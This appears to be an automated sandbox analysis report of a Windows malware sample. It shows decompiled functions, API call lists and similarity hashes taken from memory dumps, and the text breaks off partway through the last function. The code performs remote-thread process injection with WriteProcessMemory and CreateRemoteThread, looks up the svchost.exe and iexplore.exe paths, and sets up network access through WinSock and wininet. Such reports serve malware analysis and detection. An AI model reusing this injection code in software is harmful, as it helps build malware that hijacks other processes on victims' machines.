0x001d37a1
0x001d37a5
0x001d37a5
0x001d37a9
0x001d37a9
0x001d37af
0x001d375b
0x001d3763
0x001d376b
0x001d376b
0x001d37b4

APIs

GetEnvironmentVariableA.KERNEL32(SystemRoot,?,?,00000044,00000000,?,?,?,001D3118,?,00000104), ref: 001D3751
lstrcatA.KERNEL32(?,\System32\svchost.exe,?,?,?,001D3118,?,00000104), ref: 001D3763
RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe,?), ref: 001D377C
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,001D3118,?,00000104), ref: 001D3799
RegCloseKey.ADVAPI32(?,?,?,?,001D3118,?,00000104), ref: 001D37A9

Strings

SystemRoot, xrefs: 001D374C
Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe, xrefs: 001D3772
\System32\svchost.exe, xrefs: 001D375B

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D27E6, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116 Total matches: 6
threadinjection

Similarity

Total matches: 6
API ID: GetStdHandle$CloseHandleCreateRemoteThreadResumeThreadWaitForMultipleObjects
String ID: <
API String ID: 2446352009-4251816714
Opcode ID: c8242842e98a66eb1eacbd90598b53cfcf33de66ab7a76e9081f6078d45f9eb3
Instruction ID: d914cf60e619c89091d9c255d0f38381d528009b3ccf1d544689daf830366f30
Opcode Fuzzy Hash: ED0168420642E5B3F54776C41649B2051A1EF43AF5E2C032379BDB26C81B88AE29BF89
Instruction Fuzzy Hash: d914cf60e619c89091d9c255d0f38381d528009b3ccf1d544689daf830366f30

C-Code - Quality: 93%

			E001D27E6(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t56;
				void* _t73;
				void* _t78;
				void* _t83;
				void* _t84;

				_push(0xe4);
				_push(0x1d13d0);
				E001D1637(__ebx, __edi, __esi);
				 *(_t84 - 0x20) = 0;
				 *(_t84 - 0x1c) = 0;
				 *((intOrPtr*)(_t84 - 0x28)) = 0;
				 *(_t84 - 0x20) = GetStdHandle(0xfffffff4);
				E001D384D(_t84 - 0xb4, 0, 0x40);
				 *((short*)(_t84 - 0xb4)) = 0x3c;
				E001D3834(_t84 - 0xf4, _t84 - 0xb4, 0x40);
				E001D3864(_t84 - 0x74, _t84 - 0xf4, _t84 - 0xb4);
				 *((intOrPtr*)(_t84 - 0x40)) = E001D3C08;
				 *((intOrPtr*)(_t84 - 0x3c)) = E001D3C9A;
				 *((intOrPtr*)(_t84 - 0x38)) = E001D1C6D;
				_t83 =  *(_t84 + 8);
				 *(_t84 - 0x34) = _t83;
				 *_t83 = 0x238;
				 *((intOrPtr*)(_t83 + 4)) = 6;
				if( *(_t84 - 0x20) != 0 &&  *(_t84 - 0x20) == GetStdHandle(0xfffffff6)) {
					 *((intOrPtr*)(_t84 - 0x28)) = 1;
					 *(_t83 + 0x1bbc) =  *(_t83 + 0x1bbc) | 0x00000004;
					_t73 = CreateRemoteThread( *(_t84 - 0x20), 0, 0, E001D1722(E001D2997), _t83, 4, _t84 - 0x2c);
					 *(_t84 - 0x1c) = _t73;
					if(_t73 == 0) {
						 *(_t83 + 0x1bbc) =  *(_t83 + 0x1bbc) & 0x000000fb;
					}
				}
				 *((intOrPtr*)(_t84 - 0x24)) = E001D17D0;
				_t78 = E001D1CFD;
				_t56 =  *((intOrPtr*)(_t83 + 0x6c)) - 3;
				if(_t56 == 0) {
					L7:
					_t78 = 0;
					goto L8;
				} else {
					if(_t56 != 1) {
						L8:
						_t76 = _t83 + 0x1bc8;
						if(E001D1E99(_t83, _t83 + 0x1bc8, _t78, 2) == 0 || E001D1E99(_t83, _t83 + 0x78,  *((intOrPtr*)(_t84 - 0x24)), 1) == 0) {
							L17:
							return E001D173E(E001D38F2(_t84 - 0x74));
						} else {
							 *(_t84 - 4) = 0;
							if( *((intOrPtr*)(_t84 - 0x28)) == 0) {
								E001D2F13(_t76, 0);
							}
							if( *(_t84 - 0x1c) == 0) {
								do {
									_push(_t84 - 0x74);
									__eflags = E001D2522(0, _t83, __eflags);
								} while (__eflags != 0);
								goto L16;
							} else {
								ResumeThread( *(_t84 - 0x1c));
								WaitForMultipleObjects(2, _t84 - 0x20, 0, 0xffffffff);
								CloseHandle( *(_t84 - 0x1c));
								L16:
								 *(_t84 - 4) =  *(_t84 - 4) | 0xffffffff;
								goto L17;
							}
						}
					}
					 *((intOrPtr*)(_t84 - 0x24)) = 0;
					goto L7;
				}
			}

APIs

GetStdHandle.KERNEL32(000000F4,001D13D0,000000E4), ref: 001D2808

Part of subcall function 001D3864: GetVersion.KERNEL32 ref: 001D3881

GetStdHandle.KERNEL32(000000F6), ref: 001D2880
CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 001D28AC

Part of subcall function 001D1E99: InitializeCriticalSection.KERNEL32(?), ref: 001D1ED1
Part of subcall function 001D1E99: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D1EE4
Part of subcall function 001D1E99: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D1EF1
Part of subcall function 001D1E99: CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 001D1F15
Part of subcall function 001D1E99: SetThreadPriority.KERNEL32(?,?), ref: 001D1F2E

CloseHandle.KERNEL32(?), ref: 001D2932

Part of subcall function 001D2F13: ResetEvent.KERNEL32(?,?,?,00000D80,001D185C,?,00000002), ref: 001D2F3D
Part of subcall function 001D2F13: SetEvent.KERNEL32(?,?,?,00000D80,001D185C,?,00000002), ref: 001D2F49
Part of subcall function 001D2F13: WaitForSingleObject.KERNEL32(?,00000000), ref: 001D2F7C

ResumeThread.KERNEL32(?), ref: 001D291A
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001D2929

Strings

<, xrefs: 001D281C

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D2648, Relevance: 12.1, APIs: 8, Instructions: 110 Total matches: 5
threadwindownetwork

Similarity

Total matches: 5
API ID: CreateThreadGetCurrentThreadIdLocalAllocPeekMessagePostMessageSetThreadPriorityWSACleanupWSAStartup
String ID:
API String ID: 2542947916-0
Opcode ID: 2b16ed5e52240c4d80d8b10e68765e774bd0f7290044ab9ce1d8eea53ab31f33
Instruction ID: bca26f7798e6cc191a31618cb351ed7e9550d2e82e3dc5b9431044124c0254e2
Opcode Fuzzy Hash: E9014C02028CA5E7D0272B911CAA73B6042FF41FFCF9DA79271FC691C16F8596196F41
Instruction Fuzzy Hash: bca26f7798e6cc191a31618cb351ed7e9550d2e82e3dc5b9431044124c0254e2

C-Code - Quality: 91%

			E001D2648(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t42;
				void* _t54;
				void* _t56;
				void* _t63;
				void* _t65;
				void** _t71;
				void* _t75;
				void* _t76;

				_push(0x244);
				_push(0x1d13a0);
				E001D1637(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t76 - 0x1c)) = 0;
				E001D384D(_t76 - 0xa8, 0, 0x80);
				 *((intOrPtr*)(_t76 - 0x20)) = 5;
				while(1) {
					L1:
					 *(_t76 - 0x24) = 0;
					 *((intOrPtr*)(_t76 - 0x20)) =  *((intOrPtr*)(_t76 - 0x20)) - 1;
					_t42 =  *((intOrPtr*)(_t76 - 0x20)) - 1;
					if(_t42 == 0) {
						break;
					}
					_t56 = _t42 - 1;
					if(_t56 == 0) {
						_t69 =  *((intOrPtr*)(_t76 + 8));
						_t13 =  *((intOrPtr*)( *((intOrPtr*)(_t76 + 8)))) + 2; // 0x0
						if(E001D2CC7(_t76 - 0xa8,  *((intOrPtr*)( *((intOrPtr*)(_t76 + 8)))) + 6, _t13,  *((intOrPtr*)(_t69 + 4))) <= 0) {
							L14:
							E001D15A3(_t76 - 0xa8);
							while( *((intOrPtr*)(_t76 - 0x1c)) != 0) {
								 *((intOrPtr*)(_t76 - 0x1c)) =  *((intOrPtr*)(_t76 - 0x1c)) - 1;
								 *(_t76 - 4) = 0;
								L001D32DA();
								 *(_t76 - 4) =  *(_t76 - 4) | 0xffffffff;
							}
							return E001D173E(PostMessageA( *0x1d50c0, 0x400, 1, 2));
						}
						if(PeekMessageA(_t76 - 0xc4, 0, 0x12, 0x12, 0) == 0) {
							continue;
						}
						goto L14;
					}
					_t63 = _t56 - 1;
					if(_t63 == 0) {
						continue;
					}
					if(_t63 != 1) {
						goto L14;
					}
					_t65 = _t76 - 0x254;
					_push(_t65);
					_push(0x101);
					L001D1454();
					if(_t65 != 0) {
						goto L14;
					}
					 *((intOrPtr*)(_t76 - 0x1c)) =  *((intOrPtr*)(_t76 - 0x1c)) + 1;
				}
				_t75 = LocalAlloc(0x40, 0x4464);
				if(_t75 != 0) {
					 *(_t75 + 0x6c) = 1;
					 *(_t75 + 0x70) =  *(_t75 + 0x70) | 0xffffffff;
					 *(_t75 + 0x5c) =  *(_t75 + 0x5c) | 0x00000004;
					 *((intOrPtr*)(_t75 + 0x3ba8)) = GetCurrentThreadId();
					_t23 = _t75 + 0x3c58; // 0x3c58
					E001D3834(_t23, _t76 - 0xa8, 0x80);
					 *(_t75 + 0x6c) = 3;
					_t54 = CreateThread(0, 0, E001D3722, _t75, 0, _t76 - 0x28);
					_t26 = _t75 + 0x3ba4; // 0x3ba4
					_t71 = _t26;
					 *_t71 = _t54;
					if(_t54 != 0) {
						 *(_t76 - 0x24) = 1;
						 *((intOrPtr*)(_t76 - 0x74)) = 0;
						SetThreadPriority( *_t71, 0xfffffff1);
					}
				}
				E001D1ABC(_t75,  *(_t76 - 0x24));
				if( *(_t76 - 0x24) != 0) {
					goto L1;
				} else {
					goto L14;
				}
			}

APIs

WSAStartup.WSOCK32(00000101,?,?,?,?,?,?,00000000,00000080,001D13A0,00000244), ref: 001D269B

Part of subcall function 001D2CC7: LoadLibraryA.KERNEL32(wininet.dll), ref: 001D2CDB
Part of subcall function 001D2CC7: GetProcAddress.KERNEL32(001D12C8,001D12C8), ref: 001D2D07
Part of subcall function 001D2CC7: FreeLibrary.KERNEL32(?), ref: 001D2D3F
Part of subcall function 001D2CC7: inet_ntoa.WSOCK32(?), ref: 001D2D5E
Part of subcall function 001D2CC7: wsprintfA.USER32 ref: 001D2DBF

PeekMessageA.USER32(?,00000000,00000012,00000012,00000000), ref: 001D26DE
LocalAlloc.KERNEL32(00000040,00004464,?,?,?,?,?,00000000,00000080,001D13A0,00000244), ref: 001D26F4
GetCurrentThreadId.KERNEL32 ref: 001D270F
CreateThread.KERNEL32(00000000,00000000,001D3722,00000000,00000000,?), ref: 001D2743
SetThreadPriority.KERNEL32(00003BA4,000000F1), ref: 001D2763

Part of subcall function 001D1ABC: WaitForSingleObject.KERNEL32(?,00001388), ref: 001D1AED
Part of subcall function 001D1ABC: TerminateThread.KERNEL32(?,00000000), ref: 001D1B02
Part of subcall function 001D1ABC: CloseHandle.KERNEL32(?), ref: 001D1B0E
Part of subcall function 001D1ABC: LocalFree.KERNEL32(?,?), ref: 001D1B15

Part of subcall function 001D15A3: FreeLibrary.KERNEL32(00000000), ref: 001D15D1

WSACleanup.WSOCK32(?,?,?,?,?,00000000,00000080,001D13A0,00000244), ref: 001D2792
PostMessageA.USER32(00000400,00000001,00000002), ref: 001D27BB

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D19F3, Relevance: 12.1, APIs: 8, Instructions: 53 Total matches: 6
synchronization

Similarity

Total matches: 6
API ID: CloseHandle$SetEvent$DeleteCriticalSectionEnterCriticalSectionWaitForSingleObject
String ID:
API String ID: 4003875101-0
Opcode ID: 04216faaea4ba07e98bcd26563bf42db8e4c0576a096f68bb43e63f5af89c022
Instruction ID: 111ecad9f7c2c59084eeb4c9e89245a319db93d705ee502b2a98683021befae7
Opcode Fuzzy Hash: D9E08C43914E1AD0C8A7FDC0082E7061E61B76D1E2E5EC5053282436417F1EE0089F89
Instruction Fuzzy Hash: 111ecad9f7c2c59084eeb4c9e89245a319db93d705ee502b2a98683021befae7

C-Code - Quality: 100%

			E001D19F3(intOrPtr _a4) {
				signed char _t11;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t16;
				signed char* _t24;
				void** _t27;
				intOrPtr _t29;
				void* _t30;
				struct _CRITICAL_SECTION* _t32;

				_t29 = _a4;
				_t24 = _t29 + 0x1b44;
				_t11 =  *_t24;
				if((_t11 & 0x00000001) != 0) {
					_t32 = _t29 + 0x1b18;
					 *_t24 = _t11 & 0x000000fe;
					EnterCriticalSection(_t32);
					_t13 =  *(_t29 + 0x1b40);
					if(_t13 != 0) {
						SetEvent(_t13);
					}
					_t14 =  *(_t29 + 0x1b10);
					if(_t14 != 0) {
						SetEvent(_t14);
					}
					_t27 = _t29 + 0x1b0c;
					_t15 =  *_t27;
					if(_t15 != 0) {
						WaitForSingleObject(_t15, 0x7d0);
						CloseHandle( *_t27);
						 *_t27 =  *_t27 & 0x00000000;
					}
					_t16 =  *(_t29 + 0x1b40);
					if(_t16 != 0) {
						_t16 = CloseHandle(_t16);
					}
					_t30 =  *(_t29 + 0x1b10);
					if(_t30 != 0) {
						_t16 = CloseHandle(_t30);
					}
					DeleteCriticalSection(_t32);
					return _t16;
				}
				return _t11;
			}

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,76E1186A,?,001D1F3C,?), ref: 001D1A12
SetEvent.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A29
SetEvent.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A36
WaitForSingleObject.KERNEL32(?,000007D0), ref: 001D1A50
CloseHandle.KERNEL32(?), ref: 001D1A58
CloseHandle.KERNEL32(?), ref: 001D1A68
CloseHandle.KERNEL32(?), ref: 001D1A75
DeleteCriticalSection.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A78

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D2C05, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 6
windowregistrytime

Similarity

Total matches: 6
API ID: CreateWindowExDispatchMessageGetMessageGetModuleFileNameRegisterClassSetTimerTranslateMessage
String ID:
API String ID: 1289143423-0
Opcode ID: a48adf90a0f1ca95f9f8ccd3f9eb1397de436c8d144647db204e4c52001b9e96
Instruction ID: 392c3d32be3034e4c8ac56a004de0633f00134dc32ddf829a8e1a5bcd824640c
Opcode Fuzzy Hash: ABE0D843065850B3DC4B75752C0C31787917BC9ECAC9C67093056F4248CB87A61CEF43
Instruction Fuzzy Hash: 392c3d32be3034e4c8ac56a004de0633f00134dc32ddf829a8e1a5bcd824640c

C-Code - Quality: 81%

			E001D2C05(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t11;
				signed int _t15;
				CHAR* _t30;
				void* _t35;

				_push(0x128);
				_push(0x1d13f0);
				E001D1637(__ebx, __edi, __esi);
				 *(_t35 - 4) = 0;
				_t11 =  *0x1d5044; // 0x1d0000
				 *0x001D50DC = _t11;
				_t30 = _t35 - 0x138;
				 *0x001D50F0 = _t30;
				GetModuleFileNameA(_t11, _t30, 0x103);
				RegisterClassA(0x1d50cc);
				 *0x1d50c0 = CreateWindowExA(0, _t30, 0, 0x80000, 0, 0, 0, 0, 0, 0, _t11, 0);
				_t15 =  *0x1d506c; // 0x0
				asm("sbb eax, eax");
				SetTimer( *0x1d50c0, 0x64, ( ~_t15 & 0xffff1d70) + 0xea60, 0);
				while(GetMessageA(_t35 - 0x34, 0, 0, 0) != 0) {
					TranslateMessage(_t35 - 0x34);
					DispatchMessageA(_t35 - 0x34);
				}
				 *0x1d50c0 = 0;
				 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
				return E001D173E(0);
			}

APIs

GetModuleFileNameA.KERNEL32(001D0000,?,00000103,001D50CC,00000000,?,00000000,00080000,00000000,00000000,00000000,00000000,00000000,00000000,001D0000,00000000), ref: 001D2C49
RegisterClassA.USER32 ref: 001D2C4F
CreateWindowExA.USER32 ref: 001D2C55
SetTimer.USER32(00000064,-0000EA60,00000000), ref: 001D2C7D
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 001D2C8A
TranslateMessage.USER32(?), ref: 001D2C98
DispatchMessageA.USER32(?), ref: 001D2CA2

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D2997, Relevance: 9.1, APIs: 6, Instructions: 52 Total matches: 6
memorythreadinjection

Similarity

Total matches: 6
API ID: ExitThreadGetStdHandleLocalAllocLocalFreeReadProcessMemoryWriteProcessMemory
String ID:
API String ID: 3806972562-0
Opcode ID: d136b9818d58650d9e75ef7e59085fa17e81dc101a90658f0749166ad6ebe984
Instruction ID: fbdfbd466d78e4125f2339b7d6edc0ae403b586f458be2afe4e561cdaceb8fd3
Opcode Fuzzy Hash: 17E04F44158F6AE1912A79441A0F72B9014BFD7BF9C0C0B37B138315C11B5E751A6B05
Instruction Fuzzy Hash: fbdfbd466d78e4125f2339b7d6edc0ae403b586f458be2afe4e561cdaceb8fd3

C-Code - Quality: 74%

			E001D2997() {
				void* _t40;
				long _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t47;

				_push(0x10);
				_push(0x1d13c0);
				E001D1637(_t40, _t43, _t45);
				 *(_t47 - 0x1c) = LocalAlloc(0x40, 0x4464);
				_t44 = GetStdHandle(0xfffffff4);
				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				if( *(_t47 - 0x1c) != 0) {
					_push(_t47 - 0x20);
					_t41 = 4;
					_t46 =  *(_t47 + 8);
					if(WriteProcessMemory(_t44, _t46 + 0x84, _t47 - 0x1c, _t41, ??) != 0 && ReadProcessMemory(_t44, _t46,  *(_t47 - 0x1c), 0x78, _t47 - 0x20) != 0) {
						 *( *(_t47 - 0x1c) + 0x6c) = _t41;
						 *( *(_t47 - 0x1c) + 0x70) =  *( *(_t47 - 0x1c) + 0x70) | 0xffffffff;
						 *( *(_t47 - 0x1c) + 0x370c) =  *( *(_t47 - 0x1c) + 0x370c) | _t41;
						 *( *(_t47 - 0x1c) + 0x1bd4) = _t46;
						E001D27E6(_t41, _t42, _t44, _t46,  *( *(_t47 - 0x1c) + 0x370c),  *(_t47 - 0x1c));
					}
					LocalFree( *(_t47 - 0x1c));
				}
				 *(_t47 - 4) =  *(_t47 - 4) | 0xffffffff;
				ExitThread(0);
			}

APIs

LocalAlloc.KERNEL32(00000040,00004464,001D13C0,00000010), ref: 001D29AA
GetStdHandle.KERNEL32(000000F4), ref: 001D29B5
WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,?), ref: 001D29DE
ReadProcessMemory.KERNEL32(00000000,?,00000000,00000078,?), ref: 001D29F3

Part of subcall function 001D27E6: GetStdHandle.KERNEL32(000000F4,001D13D0,000000E4), ref: 001D2808
Part of subcall function 001D27E6: GetStdHandle.KERNEL32(000000F6), ref: 001D2880
Part of subcall function 001D27E6: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 001D28AC
Part of subcall function 001D27E6: ResumeThread.KERNEL32(?), ref: 001D291A
Part of subcall function 001D27E6: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001D2929
Part of subcall function 001D27E6: CloseHandle.KERNEL32(?), ref: 001D2932

LocalFree.KERNEL32(00000000), ref: 001D2A27
ExitThread.KERNEL32 ref: 001D2A3C

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 00403020, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50 Total matches: 3
threadinjection

Similarity

Total matches: 3
API ID: CloseHandleCreateRemoteThreadGetExitCodeThreadWaitForMultipleObjects
String ID: !$@
API String ID: 3598368018-1106925043
Opcode ID: 94e025a43e91df62a48eb6b8a64d63848b0e0c680d25aaeca4969afcd1c9ee64
Instruction ID: 6812434df433a10a49eb64cdae1d93602e3d9f75bbdf674f19957a85cb12a94c
Opcode Fuzzy Hash: CCD0A700DE1DC65871531046B5E47F3F1049F121CED5C379532992CB0C4B257038A241
Instruction Fuzzy Hash: 6812434df433a10a49eb64cdae1d93602e3d9f75bbdf674f19957a85cb12a94c

C-Code - Quality: 33%

			E00403020(void* __ecx, void* _a4, _Unknown_base(*)()* _a8, void* _a12, intOrPtr _a16, DWORD* _a20, intOrPtr _a24) {
				intOrPtr _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				int _t13;
				DWORD* _t18;
				intOrPtr _t22;

				_t18 = _a20;
				_t22 = _a16;
				_v12 = 0;
				_v8 = _t22;
				 *_t18 = 0;
				_t13 = CreateRemoteThread(_a4, 0, 0, _a8, _a12, 0, 0);
				_v12 = _t13;
				if(_t13 != 0) {
					if(_a24 != 0) {
						_push(0xffffffff);
						_push(0);
						_push( &_v12);
						if(_t22 == 0) {
							_push(1);
						} else {
							_push(2);
						}
						if(WaitForMultipleObjects() == 0) {
							GetExitCodeThread(_v12, _t18);
						}
					} else {
						 *_t18 = 1;
					}
					_t13 = CloseHandle(_v12);
				}
				return _t13;
			}

APIs

CreateRemoteThread.KERNEL32(?,00000000,00000000,?,00402421,00000000,00000000), ref: 00403045
WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 00403070
GetExitCodeThread.KERNEL32(?,?,?,?,!$@,004036DB,?,00000000,!$@,00000000,00000001,?,?,004031F9,?,?), ref: 0040307E
CloseHandle.KERNEL32(?), ref: 00403087

Strings

!$@, xrefs: 00403020

Memory Dump Source

Source File: 00000001.00000002.260180009.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.260173827.00400000.00000002.sdmp
Associated: 00000001.00000002.260188653.00405000.00000004.sdmp
Associated: 00000001.00000002.260196655.00407000.00000002.sdmp

Function 001D1E99, Relevance: 7.6, APIs: 5, Instructions: 63 Total matches: 6
thread

Similarity

Total matches: 6
API ID: CreateEvent$CreateThreadInitializeCriticalSectionSetThreadPriority
String ID:
API String ID: 1443725771-0
Opcode ID: cc963cedaaa8c141a90b6ba0a701b58c993f7297ed142496386f8b666d6d3d38
Instruction ID: 1c04ac80769ce1897cd6b8eb1393fb0302c44cedc3ed2add9cab6c9954ae0cc1
Opcode Fuzzy Hash: B6E0DF84A25A4FC5C437E090203F77BA4207B0E9CADDC8521308F1AFA6BF08D406AB08
Instruction Fuzzy Hash: 1c04ac80769ce1897cd6b8eb1393fb0302c44cedc3ed2add9cab6c9954ae0cc1

C-Code - Quality: 100%

			E001D1E99(intOrPtr _a4, long _a8, _Unknown_base(*)()* _a12, int _a16) {
				signed char _t21;
				intOrPtr _t26;
				void* _t29;
				void* _t33;
				void* _t41;

				_t41 = _a8;
				_t21 =  *(_t41 + 0x1b44);
				if((_t21 & 0x00000001) == 0) {
					 *(_t41 + 0x1b44) = _t21 | 0x00000001;
					_t26 = _a4;
					 *((intOrPtr*)(_t41 + 0x1b48)) = _t26;
					 *((intOrPtr*)(_t41 + 0x1b14)) =  *((intOrPtr*)(_t26 + 0x70));
					InitializeCriticalSection(_t41 + 0x1b18);
					 *((intOrPtr*)(_t41 + 0x1b40)) = CreateEventA(0, 1, 0, 0);
					_t29 = CreateEventA(0, 1, 0, 0);
					 *(_t41 + 0x1b10) = _t29;
					if( *((intOrPtr*)(_t41 + 0x1b40)) == 0 || _t29 == 0) {
						L6:
						E001D19F3(_t41);
					} else {
						if(_a12 == 0) {
							L5:
							SetThreadPriority( *(_t41 + 0x1b0c), _a16);
						} else {
							_t33 = CreateThread(0, 0, _a12, _t41, 0,  &_a8);
							 *(_t41 + 0x1b0c) = _t33;
							if(_t33 == 0) {
								goto L6;
							} else {
								goto L5;
							}
						}
					}
				}
				return 0;
			}

APIs

InitializeCriticalSection.KERNEL32(?), ref: 001D1ED1
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D1EE4
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D1EF1
CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 001D1F15
SetThreadPriority.KERNEL32(?,?), ref: 001D1F2E

Part of subcall function 001D19F3: EnterCriticalSection.KERNEL32(?,00000000,?,76E1186A,?,001D1F3C,?), ref: 001D1A12
Part of subcall function 001D19F3: SetEvent.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A29
Part of subcall function 001D19F3: SetEvent.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A36
Part of subcall function 001D19F3: WaitForSingleObject.KERNEL32(?,000007D0), ref: 001D1A50
Part of subcall function 001D19F3: CloseHandle.KERNEL32(?), ref: 001D1A58
Part of subcall function 001D19F3: CloseHandle.KERNEL32(?), ref: 001D1A68
Part of subcall function 001D19F3: CloseHandle.KERNEL32(?), ref: 001D1A75
Part of subcall function 001D19F3: DeleteCriticalSection.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A78

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D1BAA, Relevance: 7.5, APIs: 5, Instructions: 36 Total matches: 6
threadsynchronizationinjection

Similarity

Total matches: 6
API ID: CloseHandleCreateRemoteThreadGetExitCodeThreadGetStdHandleWaitForSingleObject
String ID:
API String ID: 1527658926-0
Opcode ID: 7410b3e9b634f2cff0a98ddadfc08129967f86c080f8268996739ca556ef27d6
Instruction ID: 6c9db9ca0fa4e0924711bf0fce69b9ac659a614394427811d75d21b82a4ad083
Opcode Fuzzy Hash: 6FC012804A5C0AB20527F0083D5D3060355AD112D146C7331715849542DF5CB269FF87
Instruction Fuzzy Hash: 6c9db9ca0fa4e0924711bf0fce69b9ac659a614394427811d75d21b82a4ad083

C-Code - Quality: 100%

			E001D1BAA(void* __ecx, void* __eflags, void* _a4) {
				long _v8;
				long _v12;
				void* _t7;
				void* _t19;

				_v8 = _v8 & 0x00000000;
				_t7 = GetStdHandle(0xfffffff4);
				_t19 = CreateRemoteThread(_t7, 0, 0, E001D1722(E001D2165), _a4, 0,  &_v12);
				if(_t19 != 0) {
					WaitForSingleObject(_t19, 0xffffffff);
					GetExitCodeThread(_t19,  &_v8);
					CloseHandle(_t19);
				}
				return _v8;
			}

0x001d1baf
0x001d1bb6
0x001d1bdd
0x001d1be1
0x001d1be6
0x001d1bf1
0x001d1bf8
0x001d1bf8
0x001d1c03

APIs

GetStdHandle.KERNEL32(000000F4), ref: 001D1BB6
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 001D1BD7
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 001D1BE6
GetExitCodeThread.KERNEL32(00000000,00000000), ref: 001D1BF1
CloseHandle.KERNEL32(00000000), ref: 001D1BF8

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D17D0, Relevance: 6.1, APIs: 4, Instructions: 138 Total matches: 6
synchronizationfile

Similarity

Total matches: 6
API ID: WaitForSingleObject$ReadFileResetEvent
String ID:
API String ID: 102907011-0
Opcode ID: 0299335ab9a3911fde22b8564450798ac63aade05c8ce35b27bba24940fd14d6
Instruction ID: f643c25c3e36a1ac1f5b66a08822f782b8fe4e2cd4be92b33a8443d888aa5c29
Opcode Fuzzy Hash: F711368702CDCBF5C032FC00282A7AE5040ABCAAF5D5DD33662A525AC07F49E106B748
Instruction Fuzzy Hash: f643c25c3e36a1ac1f5b66a08822f782b8fe4e2cd4be92b33a8443d888aa5c29

C-Code - Quality: 84%

			E001D17D0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t70;
				void* _t71;
				intOrPtr _t72;
				long _t77;
				void* _t85;
				intOrPtr _t87;
				long _t89;
				void* _t93;
				void* _t95;
				long _t97;
				void* _t112;
				intOrPtr _t114;
				void* _t115;

				_push(0x24);
				_push(0x1d1430);
				E001D1637(__ebx, __edi, __esi);
